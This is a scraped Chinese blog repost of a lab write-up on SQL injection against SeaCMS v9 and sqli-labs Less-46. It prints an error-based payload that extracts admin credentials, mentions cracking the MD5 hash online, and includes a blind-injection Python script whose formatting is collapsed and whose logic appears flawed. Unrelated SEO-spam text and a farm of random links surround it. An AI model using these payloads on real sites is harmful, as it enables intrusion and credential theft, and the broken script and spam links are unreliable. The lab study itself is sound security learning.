当前位置: 首页 > wzjs >正文

协会门户网站建设东莞勒流网站制作

协会门户网站建设,东莞勒流网站制作,外包网站建设费用包括网站备份,礼县网站建设海洋cmsv9 1,我们拿到海洋cmsv9源码分析发现注入点,$rlist 2,seacms开源,可以知道seacmsv9系统数据库(mysql)为seacms,存放管理员账号的表为 sea_admin,表中存放管理员姓名的字段为…

海洋cmsv9

1,我们拿到海洋cmsv9源码分析发现注入点,$rlist

2,seacms开源,可以知道seacmsv9系统数据库(mysql)为seacms,存放管理员账号的表为
sea_admin,表中存放管理员姓名的字段为name,存放管理员密码的字段为password

经过源码分析,使用以下语句注入(limit避免管理员有多个,导致SQL语句报错):
127.0.0.1/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`'`, updatexml
(1,concat_ws(0x20,0x5c,(select name from%23%0asea_admin limit 0,1)),1), @`'`
第一次尝试:

我们发现注入并没有成功

接下来我们在数据库查看表的情况

我们发现sea_comment中并没有数据所以并没有回显

那我们就添加数据

insert into sea_comment(id,uid,v_id,typeid,username,ip,ischeck,dtime,msg,m_type,reply,agree,anti,pic,vote) values (1,2,3,4,'hyd1','192,168,106,133',1,01,'sample comment',0,0,0,0,'exam01.jpg',0),(5,6,7,8,'hyd2','192,168,106,134',2,02,'sample comment',0,0,0,0,'exam02.jpg',0);

然后我们重新进行注入

发现密码是通过MD5加密了的

所以就到md5在线解密破解,md5解密加密这个网站解密

oeder by

我们发现俩次username中发现第6行不一样,所以我们可以利用这里进行注入

import requests
from bs4 import BeautifulSoupdef getDatabase(url):dataname = ''for i in range(1, 20):  # 检查每个字符位置for j in range(32,127):payload = "if(ascii(substr(database(),%d,1))=%d,username,password) -- " % (i, j)res = {"sort": payload}r = requests.get(url, params=res)# 检查返回内容,使用 BeautifulSoup 解析 HTMLsoup = BeautifulSoup(r.text, 'html.parser')# 提取密码列第6行password_row = soup.find_all('tr')[6]  # 第6行(索引为5)password_column = password_row.find_all('td')[1]  # 假设密码在第二列# 如果返回的是 'crappy',则跳过该字符#print(password_column.text.strip())if password_column.text.strip() == 'secure':#print(1)  # 如果是 crapp,就跳过当前字符w=1else:# 如果没有找到有效字符,或者跳过该字符,则继续下一个字符dataname += chr(j)  # 将识别到的字符添加到数据库名称print(dataname)  # 打印当前已经找到的字符if __name__ == '__main__':url = 'http://127.0.0.1/sqli-labs-php7-master/Less-46/index.php'getDatabase(url)


文章转载自:

http://BErP7Ldv.gmswp.cn
http://X4hMwfKb.gmswp.cn
http://v3I9EpNl.gmswp.cn
http://llC8ZRof.gmswp.cn
http://M7dUjzus.gmswp.cn
http://L0nfjvWd.gmswp.cn
http://GPn6TTav.gmswp.cn
http://sh5dlKPb.gmswp.cn
http://p43LqlI2.gmswp.cn
http://igFHKy56.gmswp.cn
http://Qsx6v32G.gmswp.cn
http://WeXM15Z1.gmswp.cn
http://zu9uHqzp.gmswp.cn
http://Np7tGzCU.gmswp.cn
http://YI3vAOjq.gmswp.cn
http://gLQk05yA.gmswp.cn
http://IIsmRp98.gmswp.cn
http://yKSfHQud.gmswp.cn
http://vTtEkef0.gmswp.cn
http://hbWitbH2.gmswp.cn
http://UZn7bDZU.gmswp.cn
http://JgyVBY5T.gmswp.cn
http://GvObwwEd.gmswp.cn
http://nZOEz0r5.gmswp.cn
http://Mut96KGX.gmswp.cn
http://tdrw2KsP.gmswp.cn
http://2VFXiHPc.gmswp.cn
http://J112XXpB.gmswp.cn
http://MXGJhwWm.gmswp.cn
http://1ETImPjf.gmswp.cn
http://www.dtcms.com/wzjs/758226.html

相关文章:

  • 专业建站团队网站备案ip更换
  • 假冒彩票网站开发网站远程数据库
  • 国外网站建设平台虹口集团网站建设
  • 南阳网站排名价格网站用图怎么做文件小质量高
  • 百度账号购买网站网络营销有哪些主要策略
  • 连云港网站推广优化推广qq群的网站
  • 网站推广哪个好如何做网站优化并快速提高权重
  • 湛江做网站公司变更地址多少钱
  • 天河做网站公司免费做公众号的网站
  • 企业官网网站建设免费做班级网站的实训报告
  • 想在网站里添加超链接怎么做做繁体书的网站
  • 做网站一天网站制作如何
  • 稳定的网站建设土地违法建设投诉网站
  • wordpress全站固定链接怎样无货源开网店
  • 如何提高网站收录网站做树状结构有什么作用
  • 网站开发记科目提供网站建设备案报价
  • wordpress地址和站点地址区别有没有可以在网站上做试卷的
  • 网站建设属于哪个专业湖北网络科技有限公司
  • 如何做网站公司名seo做网站遇到各种问题
  • 嘉兴定制型网站建设自己电脑做服务器上传网站 需要备案吗
  • 里面云智能建站企业班组建设案例
  • 用织梦做的网站 图片打开很慢设计游戏的软件
  • 济南企业网站制作费用域名网站备案
  • 网站开发安全管理建筑工程网官网招聘资料员
  • 工商注册在哪个网站大连专业网站设计服务商
  • 织梦html5手机网站模板爱站网长尾词挖掘工具
  • 网站建设技术服务合同怎么让网站分享有图片
  • 济南网站制作企业phpstudy搭建本地网站
  • 兰州网站建设 冰雨网页设计培训评价怎么写
  • 平度168网站建设移动互联网 传统网站